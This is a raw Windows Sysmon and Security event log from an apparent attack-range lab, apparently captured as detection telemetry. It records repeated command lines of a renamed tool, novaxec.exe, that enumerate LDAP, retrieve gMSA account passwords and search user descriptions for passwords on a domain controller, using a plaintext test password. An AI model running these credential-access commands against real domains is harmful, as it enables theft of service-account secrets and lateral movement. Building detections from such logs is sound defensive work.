10.8.25.231 -M get-desc-users PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f456-6762-af02-000000008101}12696C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-users PASSWORDPOLICY FILTER="password"ATTACKRANGE\ATTACKER 154100x8000000000000000426989Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:12:06.326{f537045b-f456-6762-af02-000000008101}12696C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-users PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926727SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3198C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-users PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 534500x8000000000000000426988Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:12:00.237{f537045b-f44a-6762-ac02-000000008101}3344C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426987Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:58.872{f537045b-f44d-6762-ad02-000000008101}13180C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926725SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x337cC:\Users\ATTACKER\Documents\novaxec.exe%%19360xd10novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-usercs PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426984Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:57.191{f537045b-f44d-6762-ad02-000000008101}13180C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-usercs PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f44a-6762-ac02-000000008101}3344C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-usercs PASSWORDPOLICY FILTER="password"ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926724SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980xd10C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-usercs PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426982Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:54.630{f537045b-f44a-6762-ac02-000000008101}3344C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-usercs PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426977Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:42.008{f537045b-f438-6762-a702-000000008101}5544C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426976Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:41.111{f537045b-f43a-6762-a802-000000008101}9992C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926720SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x2708C:\Users\ATTACKER\Documents\novaxec.exe%%19360x15a8novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-des-usercs PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426973Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:38.935{f537045b-f43a-6762-a802-000000008101}9992C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-des-usercs PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f438-6762-a702-000000008101}5544C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-des-usercs PASSWORDPOLICY FILTER="password"ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926719SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x15a8C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-des-usercs PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426972Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:11:36.069{f537045b-f438-6762-a702-000000008101}5544C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-des-usercs PASSWORDPOLICY FILTER="password"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426967Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:10:24.909{f537045b-f3e8-6762-a202-000000008101}2400C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426966Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:10:24.001{f537045b-f3eb-6762-a302-000000008101}2992C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 154100x8000000000000000426963Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:10:19.109{f537045b-f3eb-6762-a302-000000008101}2992C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u gMSA_ODA$ -p '' -d ATTACKRANGE.LOCAL 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f3e8-6762-a202-000000008101}2400C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u gMSA_ODA$ -p '' -d ATTACKRANGE.LOCAL 10.8.25.231ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926711SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980xbb0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x960novaxec.exe ldap -u gMSA_ODA$ -p '' -d ATTACKRANGE.LOCAL 10.8.25.231S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 4688201331200x8020000000000000926710SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x960C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u gMSA_ODA$ -p '' -d ATTACKRANGE.LOCAL 10.8.25.231S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426962Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:10:16.275{f537045b-f3e8-6762-a202-000000008101}2400C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u gMSA_ODA$ -p '' -d ATTACKRANGE.LOCAL 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426960Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:07:24.002{f537045b-f32e-6762-9f02-000000008101}7488C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426959Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:07:23.108{f537045b-f331-6762-a002-000000008101}8176C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 154100x8000000000000000426956Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:07:13.593{f537045b-f331-6762-a002-000000008101}8176C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE.LOCAL 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f32e-6762-9f02-000000008101}7488C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE.LOCAL 10.8.25.231ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926706SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1ff0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x1d40novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE.LOCAL 10.8.25.231S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 4688201331200x8020000000000000926705SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1d40C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE.LOCAL 10.8.25.231S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426955Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:07:10.699{f537045b-f32e-6762-9f02-000000008101}7488C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE.LOCAL 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426953Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:06:49.231{f537045b-f2c4-6762-9a02-000000008101}2604C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426952Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:06:48.320{f537045b-f2c6-6762-9b02-000000008101}13076C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926699SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3314C:\Users\ATTACKER\Documents\novaxec.exe%%19360xa2cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE 10.8.25.231S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426946Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:26.796{f537045b-f2c6-6762-9b02-000000008101}13076C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f2c4-6762-9a02-000000008101}2604C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE 10.8.25.231ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926698SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980xa2cC:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE 10.8.25.231S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426945Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:24.194{f537045b-f2c4-6762-9a02-000000008101}2604C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGE 10.8.25.231C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426943Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:07.391{f537045b-f2ad-6762-9702-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426942Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:05.869{f537045b-f2b0-6762-9802-000000008101}11208C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926695SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x2bc8C:\Users\ATTACKER\Documents\novaxec.exe%%19360x1dd0novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGES-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426939Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:04.053{f537045b-f2b0-6762-9802-000000008101}11208C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGEC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f2ad-6762-9702-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGEATTACKRANGE\ATTACKER 4688201331200x8020000000000000926694SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1dd0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGES-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426938Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:05:01.510{f537045b-f2ad-6762-9702-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# --gmsa -d ATTACKRANGEC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426930Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:03:06.454{f537045b-f234-6762-9302-000000008101}2648C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426929Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:03:05.378{f537045b-f237-6762-9402-000000008101}6648C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926690SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x19f8C:\Users\ATTACKER\Documents\novaxec.exe%%19360xa58novaxec.exe ldap S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426926Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:03:03.379{f537045b-f237-6762-9402-000000008101}6648C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f234-6762-9302-000000008101}2648C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926689SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980xa58C:\Users\ATTACKER\Documents\novaxec.exe%%19360x157cnovaxec.exe ldap S-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000426925Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:03:00.581{f537045b-f234-6762-9302-000000008101}2648C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f226-6762-9002-000000008101}5500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000426756Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 15:22:29.406{f537045b-e47c-6762-1e02-000000008101}960C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426754Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 15:22:27.705{f537045b-e47e-6762-1f02-000000008101}2788C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER